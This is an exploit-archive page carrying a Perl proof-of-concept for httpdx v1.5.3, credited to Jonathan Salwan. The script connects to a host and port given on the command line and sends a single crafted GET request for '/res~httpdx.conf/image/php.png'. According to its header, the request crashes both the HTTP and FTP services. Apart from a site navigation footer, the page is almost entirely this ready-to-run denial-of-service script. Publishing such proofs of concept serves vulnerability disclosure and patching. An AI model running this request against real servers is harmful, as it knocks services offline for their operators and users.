httpdx v1.5.3 Remote Break Services PoC

Exploit Code :

#!/usr/bin/perl
#
# Program : Httpdx v1.5.3
# PoC : Remote Break Services
# Homepage : http://sourceforge.net/projects/httpdx/
# Found by : Jonathan Salwan
# This Advisory : Jonathan Salwan
# Contact : j.salwan@sysdream.com
#
#
# //----- Application description
#
# Single-process HTTP1.1/FTP server; no threads or processes started per
connection, runs
# with only few threads. Includes directory listing, virtual hosting, basic
auth., support
# for PHP, Perl, Python, SSI, etc. All settings in one config/script file.

#
#
# //----- Description of vulnerability
#
# The vulnerability is caused due to an input validation error when
processing HTTP requests. This can be
# exploited to break all services http & ftp.
#
#
#
# //----- Credits
#
# http://www.sysdream.com/article.php?story_id=324§ion_id=78
# http://www.shell-storm.org
#
#

use IO::Socket;
print "\n[x]Httpdx v1.5.3 - Remote Break Services\n";

if (@ARGV < 1)
{
print "[-] Usage: <file.pl> <host> <port>\n";
print "[-] Exemple: file.pl 127.0.0.1 80\n";
exit;
}

$ip = $ARGV[0];
$port = $ARGV[1];

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip",
PeerPort => "$port") || die "[-] Connecting: Failed!\n";

print "[+] Sending request: GET /res~httpdx.conf/image/php.png
HTTP/1.1\\r\\nHost: $ip\\r\\n\\r\\n";
$msg = "GET /res~httpdx.conf/image/php.png HTTP/1.1\r\nHost:
$ip\r\n\r\n";
$socket->send($msg);

print "\n[+] Done.\n\n";

close($socket);

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason